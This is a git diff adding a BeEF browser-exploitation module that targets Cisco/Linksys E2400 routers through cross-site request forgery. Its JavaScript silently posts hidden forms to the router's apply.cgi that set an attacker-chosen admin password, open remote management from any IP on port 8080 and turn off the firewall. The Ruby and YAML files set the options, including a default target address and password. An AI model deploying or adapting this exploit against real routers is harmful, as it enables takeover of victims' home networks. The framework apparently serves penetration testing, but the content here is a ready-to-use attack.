diff --git a/modules/exploits/router/cisco_e2400_csrf/command.js b/modules/exploits/router/cisco_e2400_csrf/command.js new file mode 100644 index 000000000..e3c548b0e --- /dev/null +++ b/modules/exploits/router/cisco_e2400_csrf/command.js @@ -0,0 +1,77 @@ +// +// Copyright 2012 Wade Alcorn wade@bindshell.net +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +beef.execute(function() { + var gateway = '<%= @base %>'; + var passwd = '<%= @password %>'; + + var cisco_e2400_iframe1 = beef.dom.createIframeXsrfForm(gateway + "apply.cgi", "POST", + [ + {'type':'hidden', 'name':'submit_button', 'value':'Management'}, + {'type':'hidden', 'name':'change_action', 'value':''}, + {'type':'hidden', 'name':'action', 'value':'Apply'}, + {'type':'hidden', 'name':'PasswdModify', 'value':'0'}, + {'type':'hidden', 'name':'http_enable', 'value':'1'}, + {'type':'hidden', 'name':'https_enable', 'value':'1'}, + {'type':'hidden', 'name':'ctm404_enable', 'value':''}, + {'type':'hidden', 'name':'remote_mgt_https', 'value':'1'}, + {'type':'hidden', 'name':'wait_time', 'value':'4'}, + {'type':'hidden', 'name':'need_reboot', 'value':'0'}, + {'type':'hidden', 'name':'http_passwd', 'value':passwd}, + {'type':'hidden', 'name':'http_passwdConfirm','value':passwd}, + {'type':'hidden', 'name':'_http_enable', 'value':'1'}, + {'type':'hidden', 'name':'_https_enable', 'value':'1'}, + {'type':'hidden', 'name':'web_wl_filter', 'value':'0'}, + {'type':'hidden', 'name':'remote_management', 'value':'1'}, + {'type':'hidden', 'name':'_remote_mgt_https', 'value':'1'}, + {'type':'hidden', 'name':'remote_upgrade', 'value':'1'}, + {'type':'hidden', 'name':'remote_ip_any', 'value':'1'}, + {'type':'hidden', 'name':'http_wanport', 'value':'8080'}, + {'type':'hidden', 'name':'nf_alg_sip', 'value':'0'}, + {'type':'hidden', 'name':'ctf_disable', 'value':'0'}, + {'type':'hidden', 'name':'upnp_enable', 'value':'1'}, + {'type':'hidden', 'name':'upnp_config', 'value':'0'}, + {'type':'hidden', 'name':'upnp_internet_dis', 'value':'0'}, + ]); + + var cisco_e2400_iframe2 = beef.dom.createIframeXsrfForm(gateway + "apply.cgi", "POST", + [ + {'type':'hidden', 'name':'submit_button', 'value':'Firewall'}, + {'type':'hidden', 'name':'change_action', 'value':''}, + {'type':'hidden', 'name':'action', 'value':'Apply'}, + {'type':'hidden', 'name':'block_wan', 'value':'0'}, + {'type':'hidden', 'name':'block_loopback', 'value':'0'}, + {'type':'hidden', 'name':'multicast_pass', 'value':'1'}, + {'type':'hidden', 'name':'ipv6_multicast_pass', 'value':'1'}, + {'type':'hidden', 'name':'ident_pass', 'value':'0'}, + {'type':'hidden', 'name':'block_cookie', 'value':'0'}, + {'type':'hidden', 'name':'block_java', 'value':'0'}, + {'type':'hidden', 'name':'block_proxy', 'value':'0'}, + {'type':'hidden', 'name':'block_activex', 'value':'0'}, + {'type':'hidden', 'name':'wait_time', 'value':'3'}, + {'type':'hidden', 'name':'ipv6_filter', 'value':'off'}, + {'type':'hidden', 'name':'filter', 'value':'off'} + ]); + + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); + + cleanup = function() { + document.body.removeChild(cisco_e2400_iframe1); + document.body.removeChild(cisco_e2400_iframe2); + } + setTimeout("cleanup()", 15000); + +}); + diff --git a/modules/exploits/router/cisco_e2400_csrf/config.yaml b/modules/exploits/router/cisco_e2400_csrf/config.yaml new file mode 100644 index 000000000..2b3e0c519 --- /dev/null +++ b/modules/exploits/router/cisco_e2400_csrf/config.yaml @@ -0,0 +1,25 @@ +# +# Copyright 2012 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +beef: + module: + cisco_e2400_csrf: + enable: true + category: ["Exploits", "Router"] + name: "Cisco E2400 CSRF" + description: "Attempts to enable remote administration on HTTPS port 443, disable the firewall, and change the password on a Cisco/Linksys E2400 router." + authors: ["bcoles", "n0x00"] + target: + working: ["ALL"] diff --git a/modules/exploits/router/cisco_e2400_csrf/module.rb b/modules/exploits/router/cisco_e2400_csrf/module.rb new file mode 100644 index 000000000..0af343362 --- /dev/null +++ b/modules/exploits/router/cisco_e2400_csrf/module.rb @@ -0,0 +1,29 @@ +# +# Copyright 2012 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +class Cisco_e2400_csrf < BeEF::Core::Command + + def self.options + return [ + {'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.100.2/'}, + {'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__'} + ] + end + + def post_execute + save({'result' => @datastore['result']}) + end + +end